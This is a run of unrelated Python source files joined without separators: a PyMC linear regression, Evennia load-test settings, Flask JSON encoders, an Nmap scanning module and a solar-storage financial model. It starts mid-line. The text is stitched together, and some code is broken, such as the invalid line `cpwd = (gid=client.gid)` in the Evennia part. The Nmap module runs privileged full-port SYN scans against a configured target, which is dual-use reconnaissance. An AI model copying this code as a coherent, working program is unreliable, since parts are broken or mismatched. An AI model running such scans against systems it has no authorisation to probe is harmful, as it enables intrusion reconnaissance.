== "__main__": tf.app.run() """ Straight line fit -- linear regression ====================================== This is probably the most widespread problems in statistics: estimating the slope and ordinate of a linear relationship y = ax+b given some data (x,y). The standard least-square (SLS) solution to this problem assumes that the input data x is exact, and that errors only affect output measurements y. In many instances, this assumption does not hold and using the same SLS method yields biased parameters: the slope is underestimated and the ordinate overestimated. Here, both input and output data are assumed to be corrupted by errors of zero mean and variances of sigma_x and sigma_y respectively. Under these assumptions, the most general statistical distribution (maximum entropy) is the normal distribution. In the following, the parameter distribution is sampled by marginalizing x from .. math:: p(a,b,x \mid \tilde{x}, \tilde{y}) = p(\tilde{y} \mid a, b, x) p(\tilde{x} \mid x) p(x) p(a,b), where p(x) stands for the prior for the true input and p(a,b) the prior for the regression parameters. 
""" from pymc import stochastic, observed, deterministic, uniform_like, runiform, rnormal, Sampler, Normal, Uniform from numpy import inf, log, cos,array import pylab # ------------------------------------------------------------------------------ # Synthetic values # Replace by real data # ------------------------------------------------------------------------------ slope = 1.5 intercept = 4 N = 30 true_x = runiform(0,50, N) true_y = slope*true_x + intercept data_y = rnormal(true_y, 2) data_x = rnormal(true_x, 2) # ------------------------------------------------------------------------------ # Calibration of straight line parameters from data # ------------------------------------------------------------------------------ @stochastic def theta(value=array([2.,5.])): """Slope and intercept parameters for a straight line. The likelihood corresponds to the prior probability of the parameters.""" slope, intercept = value prob_intercept = uniform_like(intercept, -10, 10) prob_slope = log(1./cos(slope)**2) return prob_intercept+prob_slope init_x = data_x.clip(min=0, max=50) # Inferred true inputs. x = Uniform('x', lower=0, upper=50, value=init_x) @deterministic def modelled_y(x=x, theta=theta): """Return y computed from the straight line model, given the inferred true inputs and the model paramters.""" slope, intercept = theta return slope*x + intercept """ Input error model. Define the probability of measuring x knowing the true value. """ measured_input = Normal('measured_input', mu=x, tau=2, value=data_x, observed=True) """ Output error model. Define the probability of measuring x knowing the true value. In this case, the true value is assumed to be given by the model, but structural errors could be integrated to the analysis as well. """ y = Normal('y', mu=modelled_y, tau=2, value=data_y, observed=True) lootcrawl/evennia0 """ Settings and actions for the dummyrunner This module defines dummyrunner settings and sets up the actions available to dummy accounts. The settings are global variables: - TIMESTEP - time in seconds between each 'tick'. 1 is a good start. - CHANCE_OF_ACTION - chance 0-1 of action happening. Default is 0.5. - CHANCE_OF_LOGIN - chance 0-1 of login happening. 0.01 is a good number. - TELNET_PORT - port to use, defaults to settings.TELNET_PORT - ACTIONS - see below ACTIONS is a tuple ```python (login_func, logout_func, (0.3, func1), (0.1, func2) ... ) ``` where the first entry is the function to call on first connect, with a chance of occurring given by CHANCE_OF_LOGIN. This function is usually responsible for logging in the account. The second entry is always called when the dummyrunner disconnects from the server and should thus issue a logout command. The other entries are tuples (chance, func). They are picked randomly, their commonality based on the cumulative chance given (the chance is normalized between all options so if will still work also if the given chances don't add up to 1). The PROFILE variable define pre-made ACTION tuples for convenience. Each function should return an iterable of one or more command-call strings (like "look here"), so each can group multiple command operations. An action-function is called with a "client" argument which is a reference to the dummy client currently performing the action. The client object has the following relevant properties and methods: - key - an optional client key. This is only used for dummyrunner output. 
Default is "Dummy-" - cid - client id - gid - globally unique id, hashed with time stamp - istep - the current step - exits - an empty list. Can be used to store exit names - objs - an empty list. Can be used to store object names - counter() - returns a unique increasing id, hashed with time stamp to make it unique also between dummyrunner instances. The return should either be a single command string or a tuple of command strings. This list of commands will always be executed every TIMESTEP with a chance given by CHANCE_OF_ACTION by in the order given (no randomness) and allows for setting up a more complex chain of commands (such as creating an account and logging in). ---- """ import random import string # Dummy runner settings # Time between each dummyrunner "tick", in seconds. Each dummy # will be called with this frequency. TIMESTEP = 1 # TIMESTEP = 0.025 # 40/s # Chance of a dummy actually performing an action on a given tick. # This spreads out usage randomly, like it would be in reality. CHANCE_OF_ACTION = 0.5 # Chance of a currently unlogged-in dummy performing its login # action every tick. This emulates not all accounts logging in # at exactly the same time. CHANCE_OF_LOGIN = 0.01 # Which telnet port to connect to. If set to None, uses the first # default telnet port of the running server. TELNET_PORT = None # Setup actions tuple # some convenient templates DUMMY_NAME = "Dummy_{gid}" DUMMY_PWD = (''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)) + "-{gid}") START_ROOM = "testing_room_start_{gid}" ROOM_TEMPLATE = "testing_room_%s" EXIT_TEMPLATE = "exit_%s" OBJ_TEMPLATE = "testing_obj_%s" TOBJ_TEMPLATE = "testing_button_%s" TOBJ_TYPECLASS = "contrib.tutorial_examples.red_button.RedButton" # action function definitions (pick and choose from # these to build a client "usage profile" # login/logout def c_login(client): "logins to the game" # we always use a new client name cname = DUMMY_NAME.format(gid=client.gid) cpwd = DUMMY_PWD.format(gid=client.gid) room_name = START_ROOM.format(gid=client.gid) # we assign the dummyrunner cmdsert to ourselves so # we can use special commands add_cmdset = ( "py from evennia.server.profiling.dummyrunner import DummyRunnerCmdSet;" "self.cmdset.add(DummyRunnerCmdSet, persistent=False)" ) # create character, log in, then immediately dig a new location and # teleport it (to keep the login room clean) cmds = ( f"create {cname} {cpwd}", f"yes", # to confirm creation f"connect {cname} {cpwd}", f"dig {room_name}", f"teleport {room_name}", add_cmdset, ) return cmds def c_login_nodig(client): "logins, don't dig its own room" cname = DUMMY_NAME.format(gid=client.gid) cpwd = (gid=client.gid) cmds = ( f"create {cname} {cpwd}", f"connect {cname} {cpwd}" ) return cmds def c_logout(client): "logouts of the game" return ("quit",) # random commands def c_looks(client): "looks at various objects" cmds = ["look %s" % obj for obj in client.objs] if not cmds: cmds = ["look %s" % exi for exi in client.exits] if not cmds: cmds = ("look",) return cmds def c_examines(client): "examines various objects" cmds = ["examine %s" % obj for obj in client.objs] if not cmds: cmds = ["examine %s" % exi for exi in client.exits] if not cmds: cmds = ("examine me",) return cmds def c_idles(client): "idles" cmds = ("idle", "idle") return cmds def c_help(client): "reads help files" cmds = ("help", "dummyrunner_echo_response",) return cmds def c_digs(client): "digs a new room, storing exit names on client" roomname = ROOM_TEMPLATE % client.counter() exitname1 
= EXIT_TEMPLATE % client.counter() exitname2 = EXIT_TEMPLATE % client.counter() client.exits.extend([exitname1, exitname2]) return ("dig/tel %s = %s, %s" % (roomname, exitname1, exitname2),) def c_creates_obj(client): "creates normal objects, storing their name on client" objname = OBJ_TEMPLATE % client.counter() client.objs.append(objname) cmds = ( "create %s" % objname, 'desc %s = "this is a test object' % objname, "set %s/testattr = this is a test attribute value." % objname, "set %s/testattr2 = this is a second test attribute." % objname, ) return cmds def c_creates_button(client): "creates example button, storing name on client" objname = TOBJ_TEMPLATE % client.counter() client.objs.append(objname) cmds = ("create %s:%s" % (objname, TOBJ_TYPECLASS), "desc %s = test red button!" % objname) return cmds def c_socialize(client): "socializechats on channel" cmds = ( "pub Hello!", "say Yo!", "emote stands looking around.", ) return cmds def c_moves(client): "moves to a previously created room, using the stored exits" cmds = client.exits # try all exits - finally one will work return ("look",) if not cmds else cmds def c_moves_n(client): "move through north exit if available" return ("north",) def c_moves_s(client): "move through south exit if available" return ("south",) def c_measure_lag(client): """ Special dummyrunner command, injected in c_login. It measures response time. Including this in the ACTION tuple will give more dummyrunner output about just how fast commands are being processed. The dummyrunner will treat this special and inject the {timestamp} just before sending. """ return ("dummyrunner_echo_response {timestamp}",) # Action profile (required) # Some pre-made profiles to test. To make your own, just assign a tuple to ACTIONS. # # idler - does nothing after logging in # looker - just looks around # normal_player - moves around, reads help, looks around (digs rarely) (spammy) # normal_builder - digs now and then, examines, creates objects, moves # heavy_builder - digs and creates a lot, moves and examines # socializing_builder - builds a lot, creates help entries, moves, chat (spammy) # only_digger - extreme builder that only digs room after room PROFILE = "looker" if PROFILE == 'idler': ACTIONS = ( c_login, c_logout, (0.9, c_idles), (0.1, c_measure_lag), ) elif PROFILE == 'looker': ACTIONS = ( c_login, c_logout, (0.8, c_looks), (0.2, c_measure_lag) ) elif PROFILE == 'normal_player': ACTIONS = ( c_login, c_logout, (0.01, c_digs), (0.29, c_looks), (0.2, c_help), (0.3, c_moves), (0.05, c_socialize), (0.1, c_measure_lag) ) elif PROFILE == 'normal_builder': ACTIONS = ( c_login, c_logout, (0.5, c_looks), (0.08, c_examines), (0.1, c_help), (0.01, c_digs), (0.01, c_creates_obj), (0.2, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'heavy_builder': ACTIONS = ( c_login, c_logout, (0.1, c_looks), (0.1, c_examines), (0.2, c_help), (0.1, c_digs), (0.1, c_creates_obj), (0.2, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'socializing_builder': ACTIONS = ( c_login, c_logout, (0.1, c_socialize), (0.1, c_looks), (0.1, c_help), (0.1, c_creates_obj), (0.2, c_digs), (0.3, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'only_digger': ACTIONS = ( c_login, c_logout, (0.9, c_digs), (0.1, c_measure_lag) ) else: print("No dummyrunner ACTION profile defined.") import sys sys.exit() from __future__ import absolute_import from flask import request from flask.json import JSONEncoder import six from decimal import Decimal from .util import PrettyDecimal if six.PY3: unicode = str class 
IterableEncoder(JSONEncoder): def default(self, o): try: iterator = iter(o) except TypeError: pass else: return list(o) return super(IterableEncoder, self).default(o) class PrivateJsonEncoder(JSONEncoder): def default(self, o): if hasattr(o, '_json'): try: extended = request.json_extended except AttributeError: extended = request.args.get('extended', False) # request.json_extended can be a dict to set extended mode for only # certain types of objects if isinstance(extended, dict): scope_class = object scope_extended = False for cls, ext in six.iteritems(extended): if isinstance(o, cls) and issubclass(type(o), scope_class): scope_extended = ext scope_class = cls extended = scope_extended return o._json(extended) return super(PrivateJsonEncoder, self).default(o) class DecimalEncoder(JSONEncoder): def default(self, o): if isinstance(o, PrettyDecimal): return o.currency() elif isinstance(o, Decimal): return unicode(o) return super(DecimalEncoder, self).default(o) # Multiple inheritance FTW class SRPEncoder(PrivateJsonEncoder, IterableEncoder, DecimalEncoder): pass #!/usr/bin/env python3 # -*- coding: utf-8 -*- from core.constants import EXTERNAL, IG from core.regressiontest import RegressionTest from core.module import Module import xmltodict import json import os class NmapModule(Module): _type = [IG] _services = [] _target_type = EXTERNAL _defaults = {} _extension = ".xml" def run(self): command = [ "sudo", "nmap", "-sS", "-p-", "-oX", (self._tmpfile_loc()), ] self.run_cmd(" ".join(command + [self._target])) def parse(self): # Get current dir and check that path exists, else create path. target_loc = f"{os.getcwd()}/targets/{self._target}/results" # Open xml scan and convert to json if os.path.exists(f"{target_loc}/{self._res_name}.xml"): with open(f"{target_loc}/{self._res_name}.xml", "r") as f: xml = json.dumps(xmltodict.parse(f.read()), indent=4) # Overwrite scan results json with open(f"{target_loc}/{self._res_name}.json", "w+") as f: f.write(xml) def init(self): pass """ Define regression tests here """ class NmapPortRegression(RegressionTest): _extension = ".xml" # Specifies what extension the result file has _description = "Checks if a given set of Nmap ports are still open" _defaults = { } def run(self): command = [ "sudo", "nmap", "-sS", "-p", ",".join(self._payload["ports"]), "-oX", (self._tmpfile_loc()), ] self.run_cmd(" ".join(command + [self._target])) def parse(self): # Get current dir and check that path exists, else create path. 
target_loc = f"{os.getcwd()}/targets/{self._target}/regtests" # Open xml scan and convert to json if os.path.exists(f"{target_loc}/{self._res_name}.xml"): data = {} with open(f"{target_loc}/{self._res_name}.xml", "r") as f: data = xmltodict.parse(f.read()) result = {port: "closed" for port in self._payload["ports"]} # Make into list if type(data["nmaprun"]["host"]["ports"]["port"]) is not list: data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]] for port in data["nmaprun"]["host"]["ports"]["port"]: if ( port["state"]["@state"] == "open" ): result[port["@portid"]] = "open" # Overwrite scan results json with open(f"{target_loc}/{self._res_name}.json", "w+") as f: f.write(json.dumps(result, indent=4)) def check(target): ports = [] # Specifies which ports that are of interest (Leave empty if all) open_ports = [] # Check nmap file for open ports with open( f"{os.getcwd()}/targets/{target}/results/nmap_result.json", "r" ) as f: data = json.load(f) # Make into list if type(data["nmaprun"]["host"]["ports"]["port"]) is not list: data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]] # Check all ports if not ports: for port in data["nmaprun"]["host"]["ports"]["port"]: if port["state"]["@state"] == "open": open_ports.append( port["@portid"] ) # add ports with specific services else: for port in data["nmaprun"]["host"]["ports"]["port"]: if ( port["@portid"] in ports and port["state"]["@state"] == "open" ): open_ports.append(port["@portid"]) # Return None if empty if len(open_ports) == 0: return None return {"ports": open_ports} # -*- coding: utf-8 -*- import numpy as np import pandas as pd import utility_functions as utilfunc import sys import config # Import from support function repo import dispatch_functions as dFuncs import tariff_functions as tFuncs import decorators np.seterr(divide='ignore', invalid='ignore') #============================================================================== # Load logger logger = utilfunc.get_logger() #============================================================================== #%% def calc_system_size_and_financial_performance(agent): """ This function accepts the characteristics of a single agent and evaluates the financial performance of a set of solar+storage system sizes. The system size with the highest NPV is selected. Parameters ---------- agent : pandas.Series Single agent (row) from an agent dataframe. Returns ------- pandas.Series Agent with system size, business model and corresponding financial performance. 
""" #=========================================================================# # Setup #=========================================================================# try: in_cols = list(agent.index) if config.VERBOSE: logger.info(' ') logger.info("\tRunning system size calculations for: {}, {}, {}".format(agent['state'], agent['tariff_class'], agent['sector_abbr'])) logger.info('real_discount: {}'.format(agent['discount_rate'])) logger.info('loan_rate: {}'.format(agent['loan_rate'])) logger.info('down_payment: {}'.format(agent['down_payment'])) # Set resolution of dispatcher d_inc_n_est = 10 DP_inc_est = 12 d_inc_n_acc = 20 DP_inc_acc = 12 # Extract load profile load_profile = np.array(agent['consumption_hourly']) agent.loc['timesteps_per_year'] = 1 # Extract load profile pv_cf_profile = np.array(agent['solar_cf_profile']) / 1e3 agent['naep'] = float(np.sum(pv_cf_profile)) # Create battery object batt = dFuncs.Battery() batt_ratio = 3.0 tariff = tFuncs.Tariff(dict_obj=agent.loc['tariff_dict']) # Create export tariff object if agent['nem_system_size_limit_kw'] != 0: export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) original_bill, original_results = tFuncs.bill_calculator(load_profile, tariff, export_tariff) if config.VERBOSE: logger.info('original_bill: {}'.format(original_bill)) agent['first_year_elec_bill_without_system'] = original_bill * agent['elec_price_multiplier'] if config.VERBOSE: logger.info('multiplied original bill: {}'.format(agent['first_year_elec_bill_without_system'])) if agent['first_year_elec_bill_without_system'] == 0: agent['first_year_elec_bill_without_system']=1.0 agent['first_year_elec_cents_per_kwh_without_system'] = agent['first_year_elec_bill_without_system'] / agent['load_per_customer_in_bin_kwh'] #=========================================================================# # Estimate bill savings revenue from a set of solar+storage system sizes #=========================================================================# max_size_load = agent.loc['load_per_customer_in_bin_kwh']/agent.loc['naep'] max_size_roof = agent.loc['developable_roof_sqft'] * agent.loc['developable_buildings_pct'] * agent.loc['pv_power_density_w_per_sqft']/1000.0 agent.loc['max_pv_size'] = min([max_size_load, max_size_roof, agent.loc['nem_system_size_limit_kw']]) if config.VERBOSE: logger.info('max_size_load: {}'.format(max_size_load)) logger.info('max_size_roof: {}'.format(max_size_roof)) dynamic_sizing = True #False if dynamic_sizing: pv_sizes = np.arange(0, 1.1, 0.1) * agent.loc['max_pv_size'] else: # Size the PV system depending on NEM availability, either to 95% of load w/NEM, or 50% w/o NEM. In both cases, roof size is a constraint. 
if export_tariff.full_retail_nem==True: pv_sizes = np.array([min(max_size_load * 0.95, max_size_roof)]) else: pv_sizes = np.array([min(max_size_load * 0.5, max_size_roof)]) batt_powers = np.zeros(1) # Calculate the estimation parameters for each PV size est_params_df = pd.DataFrame(index=pv_sizes) est_params_df['estimator_params'] = 'temp' for pv_size in pv_sizes: load_and_pv_profile = load_profile - pv_size*pv_cf_profile est_params_df.at[pv_size, 'estimator_params'] = dFuncs.calc_estimator_params(load_and_pv_profile, tariff, export_tariff, batt.eta_charge, batt.eta_discharge) # Create df with all combinations of solar+storage sizes system_df = pd.DataFrame(dFuncs.cartesian([pv_sizes, batt_powers]), columns=['pv', 'batt_kw']) system_df['est_bills'] = None pv_kwh_by_year = np.array([sum(x) for x in np.split(np.array(pv_cf_profile), agent.loc['timesteps_per_year'])]) pv_kwh_by_year = np.concatenate([(pv_kwh_by_year - ( pv_kwh_by_year * agent.loc['pv_deg'] * i)) for i in range(1, agent.loc['economic_lifetime']+1)]) system_df['kwh_by_timestep'] = system_df['pv'].apply(lambda x: x * pv_kwh_by_year) n_sys = len(system_df) for i in system_df.index: pv_size = system_df['pv'][i].copy() load_and_pv_profile = load_profile - pv_size*pv_cf_profile # for buy all sell all agents: calculate value of generation based on wholesale prices and subtract from original bill if agent.loc['compensation_style'] == 'Buy All Sell All': sell_all = np.sum(pv_size * pv_cf_profile * agent.loc['wholesale_elec_use_per_kwh']) system_df.loc[i, 'est_bills'] = original_bill - sell_all # for net billing agents: if system size within policy limits, set sell rate to wholesale price -- otherwise, set sell rate to 0 elif (agent.loc['compensation_style'] == 'Net Billing (Wholesale)') or (agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)'): export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) if pv_size<=agent.loc['nem_system_size_limit_kw']: if agent.loc['compensation_style'] == 'Net Billing (Wholesale)': export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) elif agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)': export_tariff.set_constant_sell_price(agent.loc['hourly_excess_sell_rate_usd_per_kwh']) else: export_tariff.set_constant_sell_price(0.) 
batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # for net metering agents: if system size within policy limits, set full_retail_nem=True -- otherwise set export value to wholesale price elif agent.loc['compensation_style'] == 'Net Metering': if pv_size<=agent.loc['nem_system_size_limit_kw']: export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # for agents with no compensation mechanism: set sell rate to 0 and calculate bill with net load profile else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(0.) batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # Calculate bill savings cash flow # elec_price_multiplier is the scalar increase in the cost of electricity since 2016, when the tariffs were curated # elec_price_escalator is this agent's assumption about how the price of electricity will change in the future. 
avg_est_bill_savings = (original_bill - np.array(system_df['est_bills'])).reshape([n_sys, 1]) * agent['elec_price_multiplier'] est_bill_savings = np.zeros([n_sys, agent['economic_lifetime']+1]) est_bill_savings[:,1:] = avg_est_bill_savings escalator = (np.zeros(agent['economic_lifetime']+1) + agent['elec_price_escalator'] + 1)**list(range(agent['economic_lifetime']+1)) degradation = (np.zeros(agent['economic_lifetime']+1) + 1 - agent['pv_deg'])**list(range(agent['economic_lifetime']+1)) est_bill_savings = est_bill_savings * escalator * degradation system_df['est_bill_savings'] = est_bill_savings[:, 1] # simple representation of 70% minimum of batt charging from PV in order to # qualify for the ITC. Here, if batt kW is greater than 25% of PV kW, no ITC. batt_chg_frac = np.where(system_df['pv'] >= system_df['batt_kw']*4.0, 1.0, 0) #=========================================================================# # Determine financial performance of each system size #=========================================================================# if 'investment_incentive_pct' in agent.index: if agent['investment_incentive_year_cutoff'] >= agent['year']: investment_incentives = np.full(system_df.shape[0], agent['investment_incentive_pct']) else: investment_incentives = np.zeros(system_df.shape[0]) else: investment_incentives = np.zeros(system_df.shape[0]) if 'capacity_incentive' in agent.index: raise NotImplementedError else: capacity_based_incentives = np.zeros(system_df.shape[0]) if 'production_incentive' in agent.index: raise NotImplementedError else: production_based_incentives = np.tile(np.array([0]*agent.loc['economic_lifetime']), (system_df.shape[0],1)) if 'cash_incentives' in agent.index: raise NotImplementedError else: cash_incentives = np.array([0]*system_df.shape[0]) cf_results_est = cashflow_constructor(bill_savings=est_bill_savings, pv_size=np.array(system_df['pv']), pv_price=agent.loc['pv_price_per_kw'], pv_om=agent.loc['pv_om_per_kw'], batt_cap=np.array(system_df['batt_kw'])*batt_ratio, batt_power=np.array(system_df['batt_kw']), batt_cost_per_kw=agent.loc['batt_price_per_kw'], batt_cost_per_kwh=agent.loc['batt_price_per_kwh'], batt_om_per_kw=agent.loc['batt_om_per_kw'], batt_om_per_kwh=agent.loc['batt_om_per_kwh'], batt_chg_frac=batt_chg_frac, sector=agent.loc['sector_abbr'], itc=agent.loc['itc_fraction'], deprec_sched=agent.loc['deprec_sch'], fed_tax_rate=agent['tax_rate'], state_tax_rate=0, real_d=agent['discount_rate'], analysis_years=agent.loc['economic_lifetime'], inflation=agent.loc['inflation'], down_payment_fraction=agent.loc['down_payment'], loan_rate=agent.loc['loan_rate'], loan_term=agent.loc['loan_term'], cash_incentives=cash_incentives, ibi=investment_incentives, cbi=capacity_based_incentives, pbi=production_based_incentives) system_df['npv'] = cf_results_est['npv'] #=========================================================================# # Select system size and business model for this agent #=========================================================================# index_of_best_fin_perform_ho = system_df['npv'].idxmax() opt_pv_size = system_df['pv'][index_of_best_fin_perform_ho].copy() opt_batt_power = system_df['batt_kw'][index_of_best_fin_perform_ho].copy() opt_batt_cap = opt_batt_power*batt_ratio batt.set_cap_and_power(opt_batt_cap, opt_batt_power) tariff = tFuncs.Tariff(dict_obj=agent.loc['tariff_dict']) # for buy all sell all agents: calculate value of generation based on wholesale prices and subtract from original bill if agent.loc['compensation_style'] == 'Buy All 
Sell All': sell_all = np.sum(opt_pv_size * pv_cf_profile * agent.loc['wholesale_elec_usd_per_kwh']) opt_bill = original_bill - sell_all # package into "dummy" dispatch results dictionary accurate_results = {'bill_under_dispatch' : opt_bill, 'batt_dispatch_profile' : np.zeros(len(load_profile))} # for net billing agents: if system size within policy limits, set sell rate to wholesale price -- otherwise, set sell rate to 0 elif (agent.loc['compensation_style'] == 'Net Billing (Wholesale)') or (agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)'): export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) if opt_pv_size<=agent.loc['nem_system_size_limit_kw']: if agent.loc['compensation_style'] == 'Net Billing (Wholesale)': export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) elif agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)': export_tariff.set_constant_sell_price(agent.loc['hourly_excess_sell_rate_usd_per_kwh']) else: export_tariff.set_constant_sell_price(0.) accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) # for net metering agents: if system size within policy limits, set full_retail_nem=True -- otherwise set export value to wholesale price elif agent.loc['compensation_style'] == 'Net Metering': export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) if opt_pv_size<=agent.loc['nem_system_size_limit_kw']: export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(0.) 
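# Unlike the sizing sweep above, which ran the dispatch estimator with
# estimated=True and the DP_inc_est / d_inc_n_est increments, the selected
# system is re-dispatched below with estimated=False and the accurate-dispatch
# settings (DP_inc_acc / d_inc_n_acc) to obtain the bill and battery dispatch
# profile reported for the agent.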
accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) # add system size class system_size_breaks = [0.0, 2.5, 5.0, 10.0, 20.0, 50.0, 100.0, 250.0, 500.0, 750.0, 1000.0, 1500.0, 3000.0] #=========================================================================# # Determine dispatch trajectory for chosen system size #=========================================================================# opt_bill = accurate_results['bill_under_dispatch'] #+ one_time_charge agent.loc['first_year_elec_bill_with_system'] = opt_bill * agent.loc['elec_price_multiplier'] agent.loc['first_year_elec_bill_savings'] = agent.loc['first_year_elec_bill_without_system'] - agent.loc['first_year_elec_bill_with_system'] agent.loc['first_year_elec_bill_savings_frac'] = agent.loc['first_year_elec_bill_savings'] / agent.loc['first_year_elec_bill_without_system'] opt_bill_savings = np.zeros([1, agent.loc['economic_lifetime'] + 1]) opt_bill_savings[:, 1:] = (original_bill - opt_bill) opt_bill_savings = opt_bill_savings * agent.loc['elec_price_multiplier'] * escalator * degradation # If the batt kW is less than 25% of the PV kW, apply the ITC if opt_pv_size >= opt_batt_power*4: batt_chg_frac = 1.0 else: batt_chg_frac = 0.0 cash_incentives = np.array([cash_incentives[index_of_best_fin_perform_ho]]) investment_incentives = np.array([investment_incentives[index_of_best_fin_perform_ho]]) capacity_based_incentives = np.array([capacity_based_incentives[index_of_best_fin_perform_ho]]) production_based_incentives = np.array(production_based_incentives[index_of_best_fin_perform_ho]) cf_results_opt = cashflow_constructor(bill_savings=opt_bill_savings, pv_size=opt_pv_size, pv_price=agent.loc['pv_price_per_kw'], pv_om=agent.loc['pv_om_per_kw'], batt_cap=opt_batt_cap, batt_power=opt_batt_power, batt_cost_per_kw=agent.loc['batt_price_per_kw'], batt_cost_per_kwh=agent.loc['batt_price_per_kwh'], batt_om_per_kw=agent['batt_om_per_kw'], batt_om_per_kwh=agent['batt_om_per_kwh'], batt_chg_frac=batt_chg_frac, sector=agent.loc['sector_abbr'], itc=agent.loc['itc_fraction'], deprec_sched=agent.loc['deprec_sch'], fed_tax_rate=agent.loc['tax_rate'], state_tax_rate=0, real_d=agent.loc['discount_rate'], analysis_years=agent.loc['economic_lifetime'], inflation=agent.loc['inflation'], down_payment_fraction=agent.loc['down_payment'], loan_rate=agent.loc['loan_rate'], loan_term=agent.loc['loan_term'], cash_incentives=cash_incentives, ibi=investment_incentives, cbi=capacity_based_incentives, pbi=production_based_incentives) #=========================================================================# # Package results #=========================================================================# agent['pv_kw'] = opt_pv_size agent['batt_kw'] = opt_batt_power agent['batt_kwh'] = opt_batt_cap agent['npv'] = cf_results_opt['npv'][0] agent['cash_flow'] = cf_results_opt['cf'][0] agent['batt_dispatch_profile'] = accurate_results['batt_dispatch_profile'] agent['bill_savings'] = opt_bill_savings agent['aep'] = agent['pv_kw'] * agent['naep'] agent['cf'] = agent['naep']/8760 agent['system_size_factors'] = np.where(agent['pv_kw'] == 0, 0, pd.cut([agent['pv_kw']], system_size_breaks))[0] agent['export_tariff_results'] = original_results out_cols = list(agent.index) new_cols = [i for i in out_cols if i not in in_cols] + ['agent_id'] agent = agent.loc[agent.index.isin(new_cols)] except Exception as e: logger.info(' ') 
logger.info('--------------------------------------------') logger.info("failed in calc_system_size_and_financial_performance") logger.info(('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e), e)) logger.info('agent that failed') logger.info(agent) logger.info('--------------------------------------------') agent.to_pickle('agent_that_failed.pkl') return agent #%% @decorators.fn_timer(logger = logger, tab_level = 2, prefix = '') def calc_financial_performance(dataframe): """ Function to calculate the payback period and join it on the agent dataframe. Parameters ---------- dataframe : pandas.DataFrame Agent dataframe Returns ------- pandas.DataFrame Agent dataframe with `payback_period` joined on dataframe """ # dataframe = dataframe.reset_index() cfs = np.vstack(dataframe['cash_flow']).astype(float) # calculate payback period tech_lifetime = np.shape(cfs)[1] - 1 payback = calc_payback_vectorized(cfs, tech_lifetime) # calculate time to double ttd = calc_ttd(cfs) metric_value = np.where(dataframe['sector_abbr']=='res', payback, ttd) dataframe['metric_value'] = metric_value dataframe = dataframe.set_index('agent_id') return dataframe #%% 